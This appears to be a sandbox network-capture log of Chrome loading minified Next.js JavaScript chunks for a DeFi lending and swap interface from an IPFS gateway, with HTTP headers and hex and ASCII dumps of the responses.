                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1497.8e36954048946218.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreialy2r3eqsvrivdf7w7a5srgyd6gx2ba6gzgfrnuoxwodbhrxundu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98745
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 32 65 33 31 37 64 31 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b2e317d14-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1307INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 39 37 5d 2c 7b 39 34 36 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4e 49 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 67 4b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 70 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 46 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 69 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 56 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 79 49 3a 66 75
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1497],{94671:function(e,t,n){n.d(t,{NI:function(){return r},gK:function(){return s},pQ:function(){return o},Fi:function(){return i},iv:function(){return c},Vc:function(){return l},yI:fu
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 5f 45 4e 41 42 4c 45 44 3a 75 2e 7a 2e 44 49 53 41 42 4c 45 44 3a 69 26 26 28 73 3d 75 2e 7a 2e 55 4e 41 56 41 49 4c 41 42 4c 45 5f 44 55 45 5f 54 4f 5f 49 53 4f 4c 41 54 49 4f 4e 29 3a 73 3d 69 3f 75 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 44 49 53 41 42 4c 45 44 3a 75 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 45 4e 41 42 4c 45 44 3a 73 3d 6e 3f 75 2e 7a 2e 55 4e 41 56 41 49 4c 41 42 4c 45 5f 44 55 45 5f 54 4f 5f 49 53 4f 4c 41 54 49 4f 4e 3a 6f 3f 65 2e 75 73 61 67 65 41 73 43 6f 6c 6c 61 74 65 72 61 6c 45 6e 61 62 6c 65 64 4f 6e 55 73 65 72 3f 75 2e 7a 2e 45 4e 41 42 4c 45 44 3a 75 2e 7a 2e 44 49 53 41 42 4c 45 44 3a 75 2e 7a 2e 45 4e 41 42 4c 45 44 2c 73 7d 7d 2c 37 34 31 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 77 5f 3a 66
                                                                                                                                                                                                                                                  Data Ascii: _ENABLED:u.z.DISABLED:i&&(s=u.z.UNAVAILABLE_DUE_TO_ISOLATION):s=i?u.z.ISOLATED_DISABLED:u.z.ISOLATED_ENABLED:s=n?u.z.UNAVAILABLE_DUE_TO_ISOLATION:o?e.usageAsCollateralEnabledOnUser?u.z.ENABLED:u.z.DISABLED:u.z.ENABLED,s}},74119:function(e,t,n){n.d(t,{w_:f
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 65 67 65 78 3a 2f 5e 41 6d 6f 75 6e 74 20 5c 64 2b 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 20 74 6f 20 70 72 6f 63 65 65 64 24 2f 2c 6d 65 73 73 61 67 65 3a 22 41 6d 6f 75 6e 74 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 2e 20 50 6c 65 61 73 65 20 74 72 79 20 6c 61 72 67 65 72 20 61 6d 6f 75 6e 74 2e 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 65 20 69 6e 20 76 3f 76 5b 65 5d 3a 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 68 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 67 65 78 2e 74 65 73 74 28 65 29 7d 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6d 65 73 73 61 67 65 29 7c 7c 22 54 68 65 72 65 20 77 61 73 20 61 6e 20 69 73 73 75 65 20 66 65 74 63
                                                                                                                                                                                                                                                  Data Ascii: egex:/^Amount \d+ is too small to proceed$/,message:"Amount is too small. Please try larger amount."}];function g(e){var t;return e in v?v[e]:(null===(t=h.find((function(t){return t.regex.test(e)})))||void 0===t?void 0:t.message)||"There was an issue fetc
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2c 6e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 6e 2e 64 65 63 69 6d 61 6c 73 2c 61 2c 63 29 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 65 2e 73 65 6e 74 29 3b 63 61 73 65 20 39 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 2c 6e 2c 72 2c 61 2c 75 29 7b 72 65 74 75 72 6e 20 79 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 72 65 74 75 72 6e 28 79 3d 28 30 2c 61 2e 5a 29 28 6f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 72 2c 61 2c
                                                                                                                                                                                                                                                  Data Ascii: ,n.underlyingAsset,n.decimals,a,c);case 8:return e.abrupt("return",e.sent);case 9:case"end":return e.stop()}}),e)})))).apply(this,arguments)}function b(e,t,n,r,a,u){return y.apply(this,arguments)}function y(){return(y=(0,a.Z)(o().mark((function e(t,n,r,a,
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 29 7b 76 61 72 20 6c 3b 72 65 74 75 72 6e 20 6f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 32 2c 74 2e 67 65 74 52 61 74 65 28 7b 61 6d 6f 75 6e 74 3a 6e 2c 73 72 63 54 6f 6b 65 6e 3a 72 2c 73 72 63 44 65 63 69 6d 61 6c 73 3a 61 2c 64 65 73 74 54 6f 6b 65 6e 3a 75 2c 64 65 73 74 44 65 63 69 6d 61 6c 73 3a 73 2c 75 73 65 72 41 64 64 72 65 73 73 3a 69 2c 73 69 64 65 3a 6d 2e 50 43 2e 53 45 4c 4c 2c 6f 70 74 69 6f 6e 73 3a 63 7d 29 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 6c 3d 65 2e 73 65 6e 74 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6c 29 3b 63 61 73 65 20 34 3a 63 61
                                                                                                                                                                                                                                                  Data Ascii: ){var l;return o().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.next=2,t.getRate({amount:n,srcToken:r,srcDecimals:a,destToken:u,destDecimals:s,userAddress:i,side:m.PC.SELL,options:c});case 2:return l=e.sent,e.abrupt("return",l);case 4:ca
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1107INData Raw: 72 6e 22 2c 6c 29 3b 63 61 73 65 20 34 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 61 2c 75 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 61 2e 5a 29 28 6f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 61 2c 75 2c 73 2c 69 2c 63 2c 6c 29 7b 76 61 72 20 70 2c 64 3b 72 65 74 75 72 6e 20 6f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74
                                                                                                                                                                                                                                                  Data Ascii: rn",l);case 4:case"end":return e.stop()}}),e)})));return function(t,n,r,a,u,s,o){return e.apply(this,arguments)}}(),r=function(){var n=(0,a.Z)(o().mark((function n(r,a,u,s,i,c,l){var p,d;return o().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:ret


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  42192.168.2.549750209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC503OUTGET /_next/static/chunks/330.182af63f38cc0e3d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7572
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreieptetgj2mm5aqgsfqfkg4ujvobb76pw6ggxtfgz3mzjws3k3pxii"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/330.182af63f38cc0e3d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreieptetgj2mm5aqgsfqfkg4ujvobb76pw6ggxtfgz3mzjws3k3pxii
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 32 63 32 32 34 32 66 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b2c2242f1-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1276INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 30 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 36 33 33 36 36 29 2c 61 3d 72 28 38 37 34 36 32 29 2c 6e 3d 72 28 36 37 32 39 34 29 2c 69 3d 72 28 38 36 30 31 30 29 2c 6c 3d 72 28 39 34 37 38 30 29 2c 73 3d 72 28 34 31 37 39 36 29 2c 64 3d 72 28 38 33 31 38 37 29 2c 63 3d 72 28 33 36 36 32 32 29 2c 75 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 66 3d 72 28 33 34 38 36 37 29 3b
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),n=r(67294),i=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 62 6f 72 64 65 72 3a 60 31 70 78 20 73 6f 6c 69 64 20 24 7b 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 60 7d 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 73 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74
                                                                                                                                                                                                                                                  Data Ascii: ette.action.disabled,border:`1px solid ${(e.vars||e).palette.action.disabledBackground}`},"&:hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,s.Fq)(e.palette.text
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 65 63 74 65 64 3a 6f 2c 64 69 73 61 62 6c 65 64 3a 61 2c 73 69 7a 65 3a 6e 2c 63 6f 6c 6f 72 3a 69 7d 3d 65 2c 73 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 73 65 6c 65 63 74 65 64 22 2c 61 26 26 22 64 69 73 61 62 6c 65 64 22 2c 72 26 26 22 66 75 6c 6c 57 69 64 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 63 2e 5a 29 28 6e 29 7d 60 2c 69 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 5a 29 28 73 2c 67 2c 74 29 7d 29 28 78 29 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 29 28 6d 2c 28 30 2c 61 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 6b 2e 72 6f 6f 74 2c 73 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 66 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 52 26 26 28
                                                                                                                                                                                                                                                  Data Ascii: ected:o,disabled:a,size:n,color:i}=e,s={root:["root",o&&"selected",a&&"disabled",r&&"fullWidth",`size${(0,c.Z)(n)}`,i]};return(0,l.Z)(s,g,t)})(x);return(0,v.jsx)(m,(0,a.Z)({className:(0,i.default)(k.root,s),disabled:p,focusRipple:!f,ref:t,onClick:e=>{R&&(
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6c 75 6d 6e 22 7d 2c 65 2e 66 75 6c 6c 57 69 64 74 68 26 26 7b 77 69 64 74 68 3a 22 31 30 30 25 22 7d 2c 7b 5b 60 26 20 2e 24 7b 67 2e 67 72 6f 75 70 65 64 7d 60 5d 3a 28 30 2c 61 2e 5a 29 28 7b 7d 2c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67
                                                                                                                                                                                                                                                  Data Ascii: lumn"},e.fullWidth&&{width:"100%"},{[`& .${g.grouped}`]:(0,a.Z)({},"horizontal"===e.orientation?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRig
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 7a 2e 72 6f 6f 74 2c 70 29 2c 72 65 66 3a 74 2c 6f 77 6e 65 72 53 74 61 74 65 3a 6b 7d 2c 78 2c 7b 63 68 69 6c 64 72 65 6e 3a 6e 2e 43 68 69 6c 64 72 65 6e 2e 6d 61 70 28 73 2c 28 65 3d 3e 6e 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 3f 6e 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 7a 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 4f 3a 42 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 75 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 24 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65
                                                                                                                                                                                                                                                  Data Ascii: me:(0,i.default)(z.root,p),ref:t,ownerState:k},x,{children:n.Children.map(s,(e=>n.isValidElement(e)?n.cloneElement(e,{className:(0,i.default)(z.grouped,e.props.className),onChange:y?O:B,selected:void 0===e.props.selected?u(e.props.value,$):e.props.selecte
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC820INData Raw: 22 2c 66 2e 6f 6e 45 72 72 6f 72 26 26 28 66 2e 6f 6e 45 72 72 6f 72 3d 6e 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 45 72 72 6f 72 29 29 2c 66 2e 6f 6e 53 75 63 63 65 73 73 26 26 28 66 2e 6f 6e 53 75 63 63 65 73 73 3d 6e 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 53 75 63 63 65 73 73 29 29 2c 66 2e 6f 6e 53 65 74 74 6c 65 64 26 26 28 66 2e 6f 6e 53 65 74 74 6c 65 64 3d 6e 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 53 65 74 74 6c 65 64 29 29 2c 28 30 2c 63 2e 46 62 29 28 66 29 2c 28 30 2c 64 2e 70 66 29 28 66 2c 70 29 2c 28 30 2c 64 2e 4a 4e 29 28 70 29 3b 63 6f 6e 73 74 5b 67 5d 3d 6f 2e 75 73 65 53 74 61 74 65 28 28 28 29 3d 3e 6e 65 77 20 74 28 72 2c 66 29 29 29 2c 68 3d 67 2e 67 65 74 4f 70 74 69 6d 69 73 74 69 63 52
                                                                                                                                                                                                                                                  Data Ascii: ",f.onError&&(f.onError=n.V.batchCalls(f.onError)),f.onSuccess&&(f.onSuccess=n.V.batchCalls(f.onSuccess)),f.onSettled&&(f.onSettled=n.V.batchCalls(f.onSettled)),(0,c.Fb)(f),(0,d.pf)(f,p),(0,d.JN)(p);const[g]=o.useState((()=>new t(r,f))),h=g.getOptimisticR


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  43192.168.2.549755209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC504OUTGET /_next/static/chunks/8977.8cefff53c53bdda4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 42515
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiarzcb4rmpdfkajxxhxumabyb33mkabe7wdq6g5ui7my4toikuc6e"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8977.8cefff53c53bdda4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiarzcb4rmpdfkajxxhxumabyb33mkabe7wdq6g5ui7my4toikuc6e
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 35 62 37 64 38 63 39 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b5b7d8c95-EWR
